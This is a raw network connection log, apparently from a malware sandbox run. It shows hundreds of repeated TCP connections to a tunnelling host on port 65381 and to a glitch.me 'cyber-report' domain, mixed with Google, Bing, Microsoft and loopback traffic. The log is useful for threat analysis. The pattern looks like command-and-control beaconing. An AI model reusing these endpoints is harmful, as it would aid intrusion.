US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50490 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50493 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50520 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50523 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50541 tcp
N/A 127.0.0.1:50553 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50580 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
N/A 127.0.0.1:50587 tcp
N/A 127.0.0.1:50614 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50621 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50646 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50662 tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50671 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
N/A 127.0.0.1:50694 tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50708 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50741 tcp
N/A 127.0.0.1:50753 tcp
N/A 127.0.0.1:50769 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.130.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50785 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50817 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50830 tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50853 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.143:443 www.bing.com udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50865 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50894 tcp
N/A 127.0.0.1:50896 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50924 tcp
N/A 127.0.0.1:50927 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50948 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50951 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:50978 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:50981 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51008 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51020 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51023 tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51050 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51086 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51126 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51141 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51190 tcp
N/A 127.0.0.1:51202 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51230 tcp
N/A 127.0.0.1:51244 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51273 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51276 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51315 tcp
N/A 127.0.0.1:51318 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51348 tcp
N/A 127.0.0.1:51350 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 95.100.153.139:443 www.bing.com udp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51373 tcp
N/A 127.0.0.1:51385 tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51393 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 8.8.8.8:53 edge-http.microsoft.com udp
US 13.107.6.158:80 edge-http.microsoft.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51414 tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51418 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51439 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51458 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51472 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51499 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51511 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51531 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51543 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51559 tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51562 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51584 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51596 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51599 tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51631 tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51634 tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.194.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
N/A 127.0.0.1:51646 tcp
N/A 127.0.0.1:51658 tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51680 tcp
N/A 127.0.0.1:51683 tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 8.8.8.8:53 a.nel.cloudflare.com udp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
N/A 127.0.0.1:51707 tcp
N/A 127.0.0.1:51721 tcp
N/A 127.0.0.1:51738 tcp
N/A 127.0.0.1:51742 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51767 tcp
N/A 127.0.0.1:51782 tcp
N/A 127.0.0.1:51789 tcp
N/A 127.0.0.1:51827 tcp
N/A 127.0.0.1:51846 tcp
N/A 127.0.0.1:51858 tcp
N/A 127.0.0.1:51870 tcp
N/A 127.0.0.1:51883 tcp
N/A 127.0.0.1:51897 tcp
N/A 127.0.0.1:51910 tcp
N/A 127.0.0.1:51922 tcp
N/A 127.0.0.1:51935 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:51938 tcp
N/A 127.0.0.1:51966 tcp
N/A 127.0.0.1:51978 tcp
N/A 127.0.0.1:51988 tcp
N/A 127.0.0.1:52014 tcp
N/A 127.0.0.1:52028 tcp
N/A 127.0.0.1:52049 tcp
N/A 127.0.0.1:52065 tcp
N/A 127.0.0.1:52073 tcp
N/A 127.0.0.1:52100 tcp
N/A 127.0.0.1:52122 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52139 tcp
N/A 127.0.0.1:52154 tcp
N/A 127.0.0.1:52171 tcp
N/A 127.0.0.1:52196 tcp
N/A 127.0.0.1:52210 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52220 tcp
N/A 127.0.0.1:52245 tcp
N/A 127.0.0.1:52262 tcp
N/A 127.0.0.1:52276 tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
N/A 127.0.0.1:52286 tcp
N/A 127.0.0.1:52311 tcp
N/A 127.0.0.1:52333 tcp
N/A 127.0.0.1:52350 tcp
N/A 127.0.0.1:52371 tcp
N/A 127.0.0.1:52388 tcp
N/A 127.0.0.1:52406 tcp
N/A 127.0.0.1:52418 tcp
N/A 127.0.0.1:52442 tcp
N/A 127.0.0.1:52465 tcp
N/A 127.0.0.1:52482 tcp
N/A 127.0.0.1:52502 tcp
N/A 127.0.0.1:52528 tcp
N/A 127.0.0.1:52561 tcp
N/A 127.0.0.1:52575 tcp
N/A 127.0.0.1:52612 tcp
N/A 127.0.0.1:52633 tcp
N/A 127.0.0.1:52654 tcp
N/A 127.0.0.1:52675 tcp
N/A 127.0.0.1:52703 tcp
N/A 127.0.0.1:52726 tcp
N/A 127.0.0.1:52747 tcp
N/A 127.0.0.1:52751 tcp
N/A 127.0.0.1:52778 tcp
N/A 127.0.0.1:52795 tcp
N/A 127.0.0.1:52810 tcp
N/A 127.0.0.1:52825 tcp
N/A 127.0.0.1:52849 tcp
N/A 127.0.0.1:52866 tcp
N/A 127.0.0.1:52883 tcp
N/A 127.0.0.1:52923 tcp
N/A 127.0.0.1:52954 tcp
N/A 127.0.0.1:52978 tcp
N/A 127.0.0.1:52997 tcp
N/A 127.0.0.1:53012 tcp
N/A 127.0.0.1:53032 tcp
N/A 127.0.0.1:53047 tcp
N/A 127.0.0.1:53068 tcp
N/A 127.0.0.1:53087 tcp
N/A 127.0.0.1:53106 tcp
N/A 127.0.0.1:53128 tcp
N/A 127.0.0.1:53143 tcp
N/A 127.0.0.1:53162 tcp
N/A 127.0.0.1:53182 tcp
N/A 127.0.0.1:53196 tcp
N/A 127.0.0.1:53204 tcp
N/A 127.0.0.1:53236 tcp
US 52.182.143.212:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:53255 tcp
N/A 127.0.0.1:53276 tcp
N/A 127.0.0.1:53304 tcp
N/A 127.0.0.1:53351 tcp
N/A 127.0.0.1:53366 tcp
N/A 127.0.0.1:53387 tcp
N/A 127.0.0.1:53402 tcp
N/A 127.0.0.1:53419 tcp
N/A 127.0.0.1:53436 tcp
N/A 127.0.0.1:53453 tcp
N/A 127.0.0.1:53473 tcp
N/A 127.0.0.1:53488 tcp
N/A 127.0.0.1:53505 tcp
N/A 127.0.0.1:53519 tcp
N/A 127.0.0.1:53549 tcp
N/A 127.0.0.1:53564 tcp
N/A 127.0.0.1:53595 tcp
N/A 127.0.0.1:53607 tcp
N/A 127.0.0.1:53637 tcp
N/A 127.0.0.1:53654 tcp
N/A 127.0.0.1:53669 tcp
N/A 127.0.0.1:53682 tcp
N/A 127.0.0.1:53696 tcp
N/A 127.0.0.1:53715 tcp
N/A 127.0.0.1:53729 tcp
N/A 127.0.0.1:53745 tcp
N/A 127.0.0.1:53763 tcp
N/A 127.0.0.1:53778 tcp
N/A 127.0.0.1:53796 tcp
N/A 127.0.0.1:53822 tcp
N/A 127.0.0.1:53839 tcp
N/A 127.0.0.1:53859 tcp
N/A 127.0.0.1:53874 tcp
N/A 127.0.0.1:53878 tcp
N/A 127.0.0.1:53906 tcp
N/A 127.0.0.1:53920 tcp
N/A 127.0.0.1:53935 tcp
N/A 127.0.0.1:53950 tcp
N/A 127.0.0.1:53955 tcp
N/A 127.0.0.1:53982 tcp
N/A 127.0.0.1:53988 tcp
N/A 127.0.0.1:54016 tcp
N/A 127.0.0.1:54040 tcp
N/A 127.0.0.1:54043 tcp
N/A 127.0.0.1:54069 tcp
N/A 127.0.0.1:54086 tcp
N/A 127.0.0.1:54090 tcp
N/A 127.0.0.1:54115 tcp
N/A 127.0.0.1:54129 tcp
N/A 127.0.0.1:54146 tcp
N/A 127.0.0.1:54148 tcp
N/A 127.0.0.1:54155 tcp
N/A 127.0.0.1:54158 tcp
N/A 127.0.0.1:54166 tcp
N/A 127.0.0.1:54169 tcp
N/A 127.0.0.1:54173 tcp
N/A 127.0.0.1:54177 tcp
N/A 127.0.0.1:54180 tcp
N/A 127.0.0.1:54207 tcp
N/A 127.0.0.1:54211 tcp
N/A 127.0.0.1:54298 tcp
N/A 127.0.0.1:54311 tcp
N/A 127.0.0.1:54352 tcp
N/A 127.0.0.1:54356 tcp
N/A 127.0.0.1:54396 tcp
